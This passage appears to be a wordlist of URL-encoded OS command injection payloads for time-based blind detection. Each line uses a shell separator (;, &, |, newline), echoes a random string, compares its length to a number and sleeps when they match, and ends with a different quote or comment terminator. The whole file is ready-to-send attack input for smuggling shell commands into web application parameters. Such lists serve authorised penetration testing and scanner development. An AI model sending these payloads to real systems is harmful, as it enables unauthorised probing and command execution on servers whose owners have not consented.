%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UGGXTG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%0A%20str%3D%24%28echo%20NFRBHV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20NFRBHV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20NFRBHV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20NFRBHV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20NFRBHV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20NFRBHV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20NFRBHV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20NFRBHV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20NFRBHV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%3B%20str%3D%24%28echo%20HDIXTH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20HDIXTH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20HDIXTH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20HDIXTH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20HDIXTH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20HDIXTH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20HDIXTH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20HDIXTH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20HDIXTH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%7C%20%5B%201%20-ne%20%24%28echo%20DLKWGT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%202%20-ne%20%24%28echo%20DLKWGT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%203%20-ne%20%24%28echo%20DLKWGT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%204%20-ne%20%24%28echo%20DLKWGT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%205%20-ne%20%24%28echo%20DLKWGT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%206%20-ne%20%24%28echo%20DLKWGT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%207%20-ne%20%24%28echo%20DLKWGT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%208%20-ne%20%24%28echo%20DLKWGT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%209%20-ne%20%24%28echo%20DLKWGT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZZRWHS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZZRWHS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZZRWHS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZZRWHS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZZRWHS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZZRWHS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZZRWHS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZZRWHS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZZRWHS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%0A%20str%3D%24%28echo%20JMUDMJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20JMUDMJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20JMUDMJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20JMUDMJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20JMUDMJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20JMUDMJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20JMUDMJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20JMUDMJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20JMUDMJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%3B%20str%3D%24%28echo%20GFXUIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20GFXUIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20GFXUIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20GFXUIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20GFXUIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20GFXUIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20GFXUIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20GFXUIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20GFXUIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%7C%20%5B%201%20-ne%20%24%28echo%20UKWXJP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%202%20-ne%20%24%28echo%20UKWXJP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%203%20-ne%20%24%28echo%20UKWXJP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%204%20-ne%20%24%28echo%20UKWXJP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%205%20-ne%20%24%28echo%20UKWXJP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%206%20-ne%20%24%28echo%20UKWXJP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%207%20-ne%20%24%28echo%20UKWXJP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%208%20-ne%20%24%28echo%20UKWXJP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%209%20-ne%20%24%28echo%20UKWXJP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKXIYP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKXIYP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKXIYP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKXIYP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKXIYP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKXIYP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKXIYP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKXIYP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKXIYP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%0A%20str%3D%24%28echo%20ZPHYVS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20ZPHYVS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20ZPHYVS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20ZPHYVS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20ZPHYVS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20ZPHYVS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20ZPHYVS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20ZPHYVS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20ZPHYVS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%3B%20str%3D%24%28echo%20OTXVUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20OTXVUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20OTXVUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20OTXVUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20OTXVUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20OTXVUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20OTXVUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20OTXVUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20OTXVUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%7C%20%5B%201%20-ne%20%24%28echo%20PARKLW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%202%20-ne%20%24%28echo%20PARKLW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%203%20-ne%20%24%28echo%20PARKLW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%204%20-ne%20%24%28echo%20PARKLW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%205%20-ne%20%24%28echo%20PARKLW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%206%20-ne%20%24%28echo%20PARKLW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%207%20-ne%20%24%28echo%20PARKLW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%208%20-ne%20%24%28echo%20PARKLW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%209%20-ne%20%24%28echo%20PARKLW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FEGQZM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FEGQZM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FEGQZM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FEGQZM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FEGQZM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FEGQZM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FEGQZM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FEGQZM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FEGQZM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%0A%20str%3D%24%28echo%20ECBRPQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20ECBRPQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20ECBRPQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20ECBRPQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20ECBRPQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20ECBRPQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20ECBRPQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20ECBRPQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20ECBRPQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%3B%20str%3D%24%28echo%20CUZHIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20CUZHIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20CUZHIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20CUZHIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20CUZHIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20CUZHIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20CUZHIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20CUZHIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20CUZHIS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%7C%20%5B%201%20-ne%20%24%28echo%20KBOHVQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%202%20-ne%20%24%28echo%20KBOHVQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%203%20-ne%20%24%28echo%20KBOHVQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%